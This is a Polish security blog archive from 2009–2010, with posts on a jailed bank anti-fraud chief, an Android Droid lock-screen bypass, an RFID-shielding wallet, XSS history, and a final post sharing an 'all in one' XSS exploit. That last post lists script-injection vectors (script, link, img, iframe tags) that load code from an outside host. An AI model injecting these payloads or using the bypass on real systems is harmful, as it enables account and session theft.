29 sty 2010

I jak tu (nie) ufac

By Rob Preece Crime Correspondent

"A FORMER anti-fraud boss at the Yorkshire-based bank First Direct has been jailed for stealing from customers' accounts to fund his alcoholism and cocaine addiction.
In his £65,000-a-year job as head of fraud operations, Richard Crawford, 41, was trusted with the personal details of account holders whose finances were thought to be most at risk from criminals."

Wiecej na: http://www.yorkshirepost.co.uk/news/Banks-antifraud-boss-jailed-for.6008159.jp

12 sty 2010

Niebezpieczny Droid

Zła wiadomość dla użytkowników Droid'a. Android OS ver. 2.0.1, czyli aktualna wersja na której działa Droid, posiada lukę bezpieczeństwa która umożliwia obejście zabezpieczenia blokady ekranu.



Zabezpieczenie polega na połączeniu kropek na ekranie, w taki sposób jaki wcześniej został zdefiniowany przez użytkownika. (iPhone posiada podobną opcję).

Obejście zabezpieczenia jest niezwykle łatwe. Wystarczy zadzwonić na podatny telefon i zamiast odebrać połączenie, wystarczy na zablokowanym ekranie wcisnąć przycisk 'Back'. W efekcie znajdziemy się w menu głównym telefonu. Daje nam to pełen dostęp do telefonu, tj. konto mailowe, odwiedzone strony internetowe, ksiązka adresowa, oraz pozostałe rzeczy zapisane w pamięci telefonu.

Błąd został zgłoszony przez 'The Assurer' (https://theassurer.com/p/756.html), który twierdzi, że podatny jest jedynie Droid z wersją Android 2.0.1.

Oto odpowiedź Google odnośnie w/w sprawy:

“We are aware of the issue and we’re working to deliver a fix to Motorola Droids shortly.”
(Jesteśmy świadomi błędu. W najbliższym czasie udostępnimy łatkę dla telefonów Motorola Droid.)

Android nie jest pierwszym smartphon'em z tego typu błędem. sierpniu 2008 r., podobny błąd występował w telefonach iPhone.


http://www.techcrunch.com/2010/01/11/verizon-droid-security-bug

19 gru 2009

Stalowa chrona kart zbliżeniowych

Posiadając, ostatnio często reklamowane przez różne bank, kartę zbliżeniową, jesteśmy narażeni na możliwość zczytania z niej danych.

W jaki sposób możemy się zabezpieczyć przed złodziejami? Z pomocą przychodzi portfel 'utkany ze stali'.



Według opisu producenta, posiadając taki portfel, możemy się odprężyć i być spokojni, że nasze dane pozostaną przy nas.

Portfel utkany jest z ponad 20.000 super cienkich nici wykonanych z nierdzewnej stali. Gęstość konstrukcji tworzy pancerz naokoło naszych kart. Dzięki niej, nasze karty, są bezpieczniejsze niż do tej pory.

Metodologia szycia przypomina nam model klatki Faradaya - pomieszczenia mającego na celu zablokowanie zewnętrznych pól elektrycznych. Analogicznie wykonany portfel, zapewnia zabezpieczenie jego zawartości.

Oprócz utrudnienia zczytywania danych dla 'nowoczesnych' kieszonkowców, stalowy portfel zabezpiecza karty również przed kradzieżą metodę brute-force ;) (metal zamiast materiału).

Portfel jest w stanie pomieścić sześć kart, posiada dwa sloty wewnętrzne i 'spinkę' na banknoty.

W tej chwili dostępne są dwa modele - "Smooth" oraz "Engine Turned" - w cenie $79.95(£49 /€ 55) ~ ok. 232 PLN

Więcej o portfelu: http://www.herringtoncatalog.com/es675.html

16 gru 2009

#10 'te #urodziny #xss ! sto lat sto lat :)

16-ego stycznia, 2000, dla małej grupki inżynierów w Microsoft, zostaly zasugerowane nastepujace nazwy:

Unauthorized Site Scripting
Unofficial Site Scripting
URL Parameter Script Insertion
Cross Site Scripting
Synthesized Scripting
Fraudulent Scripting

Następnego dnia uzgodniono nazwę - Cross Site Scripting.

Na początku lutego, wypuszczono dokument (CERT):

http://www.cert.org/advisories/CA-2000-02.html

Według niektórych źródeł, za datę narodzin #XSS uznaje się środek grudnia 1999 (czyli 10 lat temu). Jednak zgodzę się tutaj z radekk, i też uznałbym raczej datę 'advisory release'.


Co się zmieniło przez ten czas? Bardzo wiele :).

Kiedyś #XSS uznawane były za nic nie znaczące, denerwujące błędy umożliwiające wyświetlenie okienka z napisem CZESC.

Wraz z pojawieniem sie 'web 2.0' sytuacja ta zmieniła się. Powstały potężne społeczności internetowe, zawierające setki tysięcy danych użytkowników. Idealne miejsce do zbierania informacji typu: login, hasło, mail, odrazu stało się głównym celem hackerów, phisherów (chyba wszyscy pamiętamy popularnego Samy (JS.Spacehero). Błędy typu SQL Injection nie były już problemem 'numer jeden' (chociaż nadal są równie niebezpieczne), bo po co dostawać się do wnętrza systemu, skoro można wykorzystać błąd po stronie zalogowanego użytkownika, pobierając jego dane identyfikacyjne (np. dane zawarte w cookie).

XSS rozwijało się w zastraszającym tempie, od prostych skryptów typu alert(document.cookie), aż po wyrafinowane skrypty które można łączyć z innego rodzaju błędami. Jako ciekawostki można polecić:

Cross Domain Search Timing

Sprawdz czy jestes zalogowany/a na google

Łącząc różne techniki ataków (CSRF, XCSS...), można stworzyć naprawdę niebezpieczne skrypty/ robaki, infekujące zarówno web serwisy, jak i komputery użytkowników.

Jak widać, nigdy nie należy nie doceniać nawet najprostszego rodzaju błędów.

3RTHF3QVVPJ2

9 gru 2009

(update) do (in)security tygodnia

Nie wiem czemu ale zapodzialo mi się to gdzieś, więc wstawiam teraz:


http://www.heise-online.pl/security/news/item/Nowy-sposob-lamania-szyfru-AES-878754.html Nowy sposób na #łamanie #AES #security #crypto

All in one exploit...s !

Witam. Dzisiaj w moje raczki wpadla super paczka mini tyci exploitow ;)

Otoz pan sirdarckcat przed chwilą opublikował niezły zestaw exploitów all in one.

Oto one:

http://0x.lv/xss.xml XBL+XHTML

http://0x.lv/xss.css (binding/expression/jsuri)

http://0x.lv/xss.swf (getURL)

<script src=//0x.lv> LUB <link rel=stylesheet href=//0x.lv> LUB <img src=//0x.lv> LUB <iframe src=//0x.lv> także: XHR/RFI/etc


Testujcie testujcie :)

http://0x.lv/ all in one BMP+JS+CSS+HTML+HTTP+XHR XSS exploit ;)